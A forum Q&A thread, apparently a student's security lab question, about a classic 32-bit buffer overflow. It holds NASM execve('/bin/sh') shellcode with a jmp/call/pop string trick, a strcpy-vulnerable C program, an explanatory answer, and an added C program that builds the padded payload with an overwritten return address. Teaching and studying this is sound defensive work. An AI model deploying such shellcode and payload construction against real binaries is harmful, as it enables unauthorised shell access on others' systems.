
I have C code and assembly code which I have to use to perform a buffer overflow attack on the C program using GDB. I would probably use the command run $(cat ), but..

I can't manage to compile the assembler code: times NNNN db 0xff gives an error about assigning non-constant values, but I don't actually know what it does, or is supposed to do.

It seems that the last 4 lines work like a push onto the stack which esi points to, right?

The line mov byte al, 0x0b calls execv with the arguments /bin/sh0, AAAA and BBBB. Why do we need the last two?

Lastly, the int 0x80, which again I don't know what it does.

Also, the jmp short callit -> callit: call doit: what is the difference between that and just starting with doit from the beginning?

If someone could help me out I'd be grateful, I'm lost after googling for hours.

NASM x86 code:

BITS 32
jmp short   callit              ; jump forward over doit to the CALL below

doit:
pop         esi                 ; esi = address pushed by CALL = address of '/bin/sh#AAAABBBB'
xor         eax, eax            ; eax = 0 without putting a 0x00 byte into the code
mov         byte [esi+7], al    ; overwrite '#' with the NUL that terminates "/bin/sh"
lea         ebx, [esi]          ; ebx = address of "/bin/sh"   (posted as 'lea bx, [esi]', a typo)
mov         dword [esi+8], ebx  ; AAAA <- argv[0] = pointer to "/bin/sh"
mov         dword [esi+12], eax ; BBBB <- argv[1] = NULL (end of the argv array)
mov         al, 0x0b            ; eax = 11 = execve system call number on 32-bit Linux
mov         ebx, esi            ; execve argument 1: path   = esi
lea         ecx, [esi+8]        ; execve argument 2: argv   = esi+8  (posted as 'lea exc, ...', a typo)
lea         edx, [esi+12]       ; execve argument 3: envp   = esi+12 (array holding only NULL)
int         0x80                ; enter the kernel: execve("/bin/sh", argv, envp)

callit:
call        doit                ; pushes the address of the string below as the return address, then jumps to doit

            db '/bin/sh#AAAABBBB'   ; '#', AAAA and BBBB are placeholders patched at run time, so the payload holds no 0x00
times NNNN  db 0xff                 ; NNNN must be replaced by a number: padding that reaches the saved return address
            dd 0xbffff050           ; new return address = the buffer address the C program prints, i.e. the start of this code
            db 0x00                 ; terminates the string that strcpy copies

C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char buffer[256];

    if (argc > 1) {
        strcpy(buffer, argv[1]);        /* unbounded copy: an argv[1] longer than 256 bytes overruns the frame */
    }
    printf("%p\n", (void *)buffer);     /* prints the buffer address used as the return address in the payload */
    return 0;
}

1 Answer


You can't assemble times NNNN db 0xff because NNNN is not defined anywhere. You are presumably supposed to substitute a number there.

You need AAAA and BBBB so you can set up the argv array for the system call. argv[0] should be pointing to the program name and argv[1] should be NULL.

The CALL is used because that puts the return address on the stack, so you can use that to figure out the absolute address of your data.
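As an added worked example (not code from the question or the answer), the following C program models two of the points above: what the shellcode's stores do to the block /bin/sh#AAAABBBB once pop esi has supplied its address (why argv[0] and argv[1] need room in the payload), and how NNNN follows from the distance between buffer[0] and the saved return address. Addresses are modelled as uint32_t, the pointer width of the 32-bit target, so the program runs unchanged on a 64-bit host. The esi value, the 30-byte stand-in for the machine code and the 264-byte return-address offset used in main() are constructed placeholders; the real offset has to be read from the frame in GDB for the binary actually compiled.

```c
/* Added example: simulates the shellcode's argv set-up and the NNNN
 * computation in portable C. Not part of the original question or answer. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK_LEN 16u                 /* strlen("/bin/sh#AAAABBBB") */

/* Registers the shellcode leaves for int 0x80 (eax = 0x0b = execve). */
struct execve_operands {
    uint32_t ebx_path;                /* address of "/bin/sh"             */
    uint32_t ecx_argv;                /* address of the argv array, esi+8 */
    uint32_t edx_envp;                /* address of the NULL envp, esi+12 */
};

/* Little-endian 32-bit load/store, as the 32-bit kernel reads argv[i]. */
uint32_t load32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

void store32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Apply the shellcode's stores to a copy of the 16-byte block. `esi` is the
 * address the shellcode popped; `block` is host memory standing in for it. */
struct execve_operands patch_block(uint8_t block[BLOCK_LEN], uint32_t esi)
{
    struct execve_operands op;
    block[7] = 0;                     /* mov byte [esi+7], al   : '#'  -> NUL terminator   */
    store32(block + 8, esi);          /* mov dword [esi+8], ebx : AAAA -> argv[0] = path   */
    store32(block + 12, 0);           /* mov dword [esi+12], eax: BBBB -> argv[1] = NULL   */
    op.ebx_path = esi;                /* mov ebx, esi                                      */
    op.ecx_argv = esi + 8;            /* lea ecx, [esi+8]                                  */
    op.edx_envp = esi + 12;           /* lea edx, [esi+12]                                 */
    return op;
}

/* NNNN: bytes of 0xff after the code and the block so that the dd lands on the
 * saved return address. code_len = machine code preceding the block, ret_off =
 * distance from buffer[0] to the saved return address. (size_t)-1 if no fit. */
size_t padding_count(size_t code_len, size_t ret_off)
{
    size_t used = code_len + BLOCK_LEN;
    return used > ret_off ? (size_t)-1 : ret_off - used;
}

/* Lay out the file that `run $(cat file)` passes as argv[1]:
 *   code | "/bin/sh#AAAABBBB" | NNNN x 0xff | dd ret_addr | db 0
 * Returns the length without the final NUL, or 0 if the payload does not fit
 * or contains a NUL before its end (strcpy would stop copying there). */
size_t build_payload(uint8_t *out, size_t out_len, const uint8_t *code, size_t code_len,
                     size_t ret_off, uint32_t ret_addr)
{
    size_t nnnn = padding_count(code_len, ret_off);
    size_t total = ret_off + 4;
    if (nnnn == (size_t)-1 || total + 1 > out_len)
        return 0;
    memcpy(out, code, code_len);
    memcpy(out + code_len, "/bin/sh#AAAABBBB", BLOCK_LEN);
    memset(out + code_len + BLOCK_LEN, 0xff, nnnn);
    store32(out + ret_off, ret_addr);
    out[total] = 0;
    return memchr(out, 0, total) ? 0 : total;
}

int main(void)
{
    uint8_t block[BLOCK_LEN];
    uint8_t code[30];                 /* constructed stand-in for the real machine code */
    uint8_t payload[512];
    struct execve_operands op;
    size_t n;

    memcpy(block, "/bin/sh#AAAABBBB", BLOCK_LEN);
    op = patch_block(block, 0xbffff080u);             /* constructed esi value */
    printf("path=\"%s\" argv[0]=0x%08x argv[1]=0x%08x ecx=0x%08x edx=0x%08x\n",
           (char *)block, load32(block + 8), load32(block + 12), op.ecx_argv, op.edx_envp);

    memset(code, 0x90, sizeof code);
    /* 264 is an assumed distance to the saved return address; the buffer is
     * 256 bytes, but the real distance depends on the compiled frame layout. */
    n = build_payload(payload, sizeof payload, code, sizeof code, 264, 0xbffff050u);
    printf("NNNN=%zu payload=%zu bytes\n", padding_count(sizeof code, 264), n);
    return n ? 0 : 1;
}
```

Compile with cc -std=c99 and run. The memchr check at the end of build_payload is the practical reason the shellcode zeroes eax at run time and patches the '#' instead of embedding a 0x00 in the string: strcpy copies up to the first NUL, so a payload (or a return address such as 0xbffff000) containing one is cut short before the saved return address is reached.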


1 Comment

But.. what am I supposed to put in there? I have no idea what the purpose of these db/dd declarations is. Overall, I know that I have to overflow the buffer exactly so that I can change the address to which ret jumps in strcpy, presumably to the execv call with the shell, but I am lost on how to do that :/
